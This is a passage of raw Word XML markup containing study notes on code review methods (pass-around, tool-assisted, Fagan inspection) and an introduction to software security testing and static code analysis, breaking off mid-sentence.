        </w:rPr>
        <w:t xml:space="preserve">Over-the-Shoulder: </w:t>
      </w:r>
      <w:r w:rsidR="000E3DBD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Relies on a pair of developers, where </w:t>
      </w:r>
      <w:r w:rsidR="00B42ED7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>the interaction is not constant but consists of periods where the developers will explain the code to each other.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FE5678" w14:textId="57DE25CD" w:rsidR="00E41078" w:rsidRDefault="00E41078" w:rsidP="00E4107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This saves cost while ensuring there can be critiquing and understanding of all of the code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42EDEC77" w14:textId="77777777" w:rsidR="007F3BA8" w:rsidRDefault="007F3BA8" w:rsidP="007F3BA8">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Cost: Medium</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C957077" w14:textId="77777777" w:rsidR="007F3BA8" w:rsidRDefault="007F3BA8" w:rsidP="007F3BA8">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Review Occurrence: Real Time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0859E6" w14:textId="77777777" w:rsidR="007F3BA8" w:rsidRDefault="007F3BA8" w:rsidP="007F3BA8">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Ability to Explain Code: High</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F985B27" w14:textId="58BD0777" w:rsidR="007F3BA8" w:rsidRPr="007F3BA8" w:rsidRDefault="007F3BA8" w:rsidP="007F3BA8">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Skill Required: No </w:t>
      </w:r>
      <w:r w:rsidR="00CA4D3D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Additional Skill</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE7AAA7" w14:textId="11286DD6" w:rsidR="00E41078" w:rsidRDefault="00E41078" w:rsidP="00E41078">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Pass-Around Code Reviews</w:t>
      </w:r>
      <w:r w:rsidR="00297564">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Email Pass-Around Code Review)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44593A48" w14:textId="19C5755A" w:rsidR="0033539F" w:rsidRDefault="00EB43AC" w:rsidP="0033539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 form of manual peer review done by sending completed code to reviewers who check the code for issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2423C20A" w14:textId="2D5BC6ED" w:rsidR="00EB43AC" w:rsidRDefault="00EB43AC" w:rsidP="00EB43AC">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May involve different reviewers with different expertise and experience.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333454BA" w14:textId="17DDEA8F" w:rsidR="00813D17" w:rsidRDefault="00813D17" w:rsidP="00813D17">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Allows for more </w:t>
      </w:r>
      <w:r w:rsidR="00AC25DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>flexibility but</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> doesn</w:t>
      </w:r>
      <w:r w:rsidR="00AC25DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>’t provide as much as a learning experience to the writer compared to other methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493F3447" w14:textId="71215725" w:rsidR="007F3BA8" w:rsidRDefault="007F3BA8" w:rsidP="007F3BA8">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Cost: </w:t>
      </w:r>
      <w:r w:rsidR="00CA4D3D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Low/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Medium</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C5678E" w14:textId="77531257" w:rsidR="007F3BA8" w:rsidRDefault="007F3BA8" w:rsidP="007F3BA8">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Review Occurrence: </w:t>
      </w:r>
      <w:r w:rsidR="00CA4D3D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Asynchronous</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68226B4E" w14:textId="620C43F8" w:rsidR="007F3BA8" w:rsidRDefault="007F3BA8" w:rsidP="007F3BA8">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Ability to Explain Code: </w:t>
      </w:r>
      <w:r w:rsidR="00CA4D3D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Low</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D802CB0" w14:textId="00DF0384" w:rsidR="007F3BA8" w:rsidRPr="007F3BA8" w:rsidRDefault="007F3BA8" w:rsidP="007F3BA8">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Skill Required: </w:t>
      </w:r>
      <w:r w:rsidR="00CA4D3D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>No Additional Skill</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D27758B" w14:textId="257BA193" w:rsidR="00AC25DF" w:rsidRDefault="00AC25DF" w:rsidP="00AC25DF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Tool-Assisted Review:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BD51B6" w14:textId="21AE7073" w:rsidR="00AC25DF" w:rsidRDefault="00195652" w:rsidP="00AC25D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Rely on formal or informal software-based tools to conduct code reviews.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B43AB0" w14:textId="71509AD5" w:rsidR="009C424B" w:rsidRDefault="009C424B" w:rsidP="009C424B">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lastRenderedPageBreak/>
        <w:t>Include Atlassian’s Crucible, Codacy’s static code review tool, and Phabricator’s Differential code review tool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557AA3E5" w14:textId="1D95DA40" w:rsidR="00DF518F" w:rsidRDefault="00DF518F" w:rsidP="009C424B">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All are good, but fit different models that companies must decide.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F8DB6D" w14:textId="77777777" w:rsidR="00F86DB2" w:rsidRDefault="00F86DB2" w:rsidP="00F86DB2">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Cost: Medium</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1306A39E" w14:textId="4FA78DF4" w:rsidR="00F86DB2" w:rsidRDefault="00F86DB2" w:rsidP="00F86DB2">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Review Occurrence: Tool/Process Dependent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BF8EAA" w14:textId="37F4570C" w:rsidR="00F86DB2" w:rsidRDefault="00F86DB2" w:rsidP="00F86DB2">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Ability to Explain Code: Typically</w:t>
      </w:r>
      <w:r w:rsidR="00C770C9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Low</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6046AA1C" w14:textId="28126FDA" w:rsidR="00F86DB2" w:rsidRDefault="00F86DB2" w:rsidP="00F86DB2">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Skill Required: </w:t>
      </w:r>
      <w:r w:rsidR="00C770C9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Training for Tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49204CA0" w14:textId="35A4CE91" w:rsidR="001A43E7" w:rsidRDefault="00ED29D2" w:rsidP="001A43E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Formal Code Review</w:t>
      </w:r>
      <w:r w:rsidR="00391978">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00391978">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DFCCC6" w14:textId="3B68BF37" w:rsidR="00391978" w:rsidRDefault="00391978" w:rsidP="0039197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Reviews that are more in-depth and time consuming involving a team of expert</w:t>
      </w:r>
      <w:r w:rsidR="00FC4565">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s, with the primary form being a Fagan inspection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5C0582" w14:textId="264DFF2D" w:rsidR="00832FBF" w:rsidRDefault="00DD72EC" w:rsidP="00832FBF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD72EC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Fagan Inspection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F881D0C" w14:textId="21D5334C" w:rsidR="00DD72EC" w:rsidRDefault="00DD72EC" w:rsidP="00DD72EC">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A</w:t>
      </w:r>
      <w:r w:rsidR="00620987">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> form of structured, formal code review intended to find a variety of problems during the development process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433F1AD9" w14:textId="683FB96D" w:rsidR="00BF1964" w:rsidRDefault="00BF1964" w:rsidP="00BF1964">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Cost: High</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F5C042" w14:textId="3FBBC04C" w:rsidR="00BF1964" w:rsidRDefault="00BF1964" w:rsidP="00BF1964">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Review Occurrence: Asynchronous</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDDA47A" w14:textId="029F8614" w:rsidR="00BF1964" w:rsidRDefault="00BF1964" w:rsidP="00BF1964">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Ability to Explain Code: Typically Low</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F36A3B" w14:textId="2E9DDE29" w:rsidR="00BF1964" w:rsidRPr="00BF1964" w:rsidRDefault="00BF1964" w:rsidP="00BF1964">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Skill Required: Code Review Process Training</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521F6532" w14:textId="58EFE8CB" w:rsidR="006B0211" w:rsidRDefault="006B0211" w:rsidP="00DD72EC">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Has Six Phases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7042EAB9" w14:textId="0990FED7" w:rsidR="006B0211" w:rsidRDefault="006B0211" w:rsidP="006B0211">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0073687B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. Planning</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, including preparation of materials, attendees, and location.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CB1D47" w14:textId="74774A91" w:rsidR="006B0211" w:rsidRDefault="006B0211" w:rsidP="006B0211">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0073687B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. Overview</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, which prepares the team by reviewing the materials and assigning roles such as coder, reader, reviewers, and moderator.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5809719B" w14:textId="348488A0" w:rsidR="006B0211" w:rsidRDefault="006B0211" w:rsidP="006B0211">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0073687B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3. Preparation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, which involves reviewing </w:t>
      </w:r>
      <w:r w:rsidR="00774F49">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">the code or other item being inspected and documents any </w:t>
      </w:r>
      <w:r w:rsidR="0055601B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>issues or questions they may have.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7886E4FD" w14:textId="23CCD00C" w:rsidR="0055601B" w:rsidRDefault="0055601B" w:rsidP="006B0211">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0073687B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4. Meeting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to identify defects based on the notes from the preparation phase.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B142F1A" w14:textId="4039AA36" w:rsidR="0055601B" w:rsidRDefault="0055601B" w:rsidP="006B0211">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0073687B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5. Rework</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to resolve issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A43187" w14:textId="2C6BB0B6" w:rsidR="0055601B" w:rsidRPr="00F86DB2" w:rsidRDefault="0055601B" w:rsidP="006B0211">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6</w:t>
      </w:r>
      <w:r w:rsidRPr="0073687B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Follow-up</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> by the moderators to ensure that all issues identified have been found and that no new defects were created during the resolution process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7322DDEB" w14:textId="7B09329D" w:rsidR="008E283A" w:rsidRDefault="008E283A" w:rsidP="008E283A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Choosing a Review Method:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055C48AC" w14:textId="03B4D632" w:rsidR="00DD6F37" w:rsidRDefault="00941181" w:rsidP="003E454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Each review method has its pros and cons, but </w:t>
      </w:r>
      <w:r w:rsidR="00DD6F37">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>there are other factors like the experience of reviewers that ultimately change the worth of each method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06732FFA" w14:textId="2A9A5C38" w:rsidR="003E4548" w:rsidRDefault="003E4548" w:rsidP="003E4548">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lastRenderedPageBreak/>
        <w:t>Software Security Testing:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2493D077" w14:textId="31A9102D" w:rsidR="003E4548" w:rsidRDefault="00091F3A" w:rsidP="003E454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About 83% of applications tested have been found to have at least one security vulnerability</w:t>
      </w:r>
      <w:r w:rsidR="00193C46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> from Veracode’s 2019 study.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C67F5C" w14:textId="3BF7625A" w:rsidR="00193C46" w:rsidRDefault="00193C46" w:rsidP="003E4548">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Analyzing and Testing Code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34207D07" w14:textId="5BA72461" w:rsidR="00193C46" w:rsidRDefault="00193C46" w:rsidP="00193C4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source code for an app can </w:t>
      </w:r>
      <w:r w:rsidR="00A5392C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>contain bugs and flaws with problems in business logic, error handling, and integration with other services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B831B7" w14:textId="717994B5" w:rsidR="004D5732" w:rsidRDefault="00E92AE2" w:rsidP="00193C4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Static or dynamic code analysis can find these problems along with testing methods like fuzzing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C2463D" w14:textId="5325F04C" w:rsidR="00E92AE2" w:rsidRDefault="00E92AE2" w:rsidP="00E92AE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Once changes are made to code and it is deployed, </w:t>
      </w:r>
      <w:r w:rsidR="00652E82">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>the app must be regression tested to ensure no new security issues appeared.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A941CAD" w14:textId="7ECF8422" w:rsidR="00652E82" w:rsidRDefault="00652E82" w:rsidP="00652E82">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Static Code Analysis</w:t>
      </w:r>
      <w:r w:rsidR="00C00E7F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Source Code Analysis)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17968475" w14:textId="50836797" w:rsidR="00652E82" w:rsidRDefault="004F41AE" w:rsidP="00652E8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Conducted by reviewing the code for an application</w:t>
      </w:r>
      <w:r w:rsidR="001E4171">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, they do not run the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0CFB95" w14:textId="69584830" w:rsidR="004F41AE" w:rsidRDefault="004F41AE" w:rsidP="004F41A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Can be considered </w:t>
      </w:r>
      <w:r w:rsidR="00A130B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>white box testing since all source code is fully visible to testers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5791C3D0" w14:textId="1D1FEDC9" w:rsidR="00A130B4" w:rsidRDefault="00A130B4" w:rsidP="00A130B4">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This</w:t>
      </w:r>
      <w:r w:rsidR="00470A12">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> can </w:t>
      </w:r>
      <w:r w:rsidR="001E4171">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>allow</w:t>
      </w:r>
      <w:r w:rsidR="00D55A9A">
        <w:rPr>
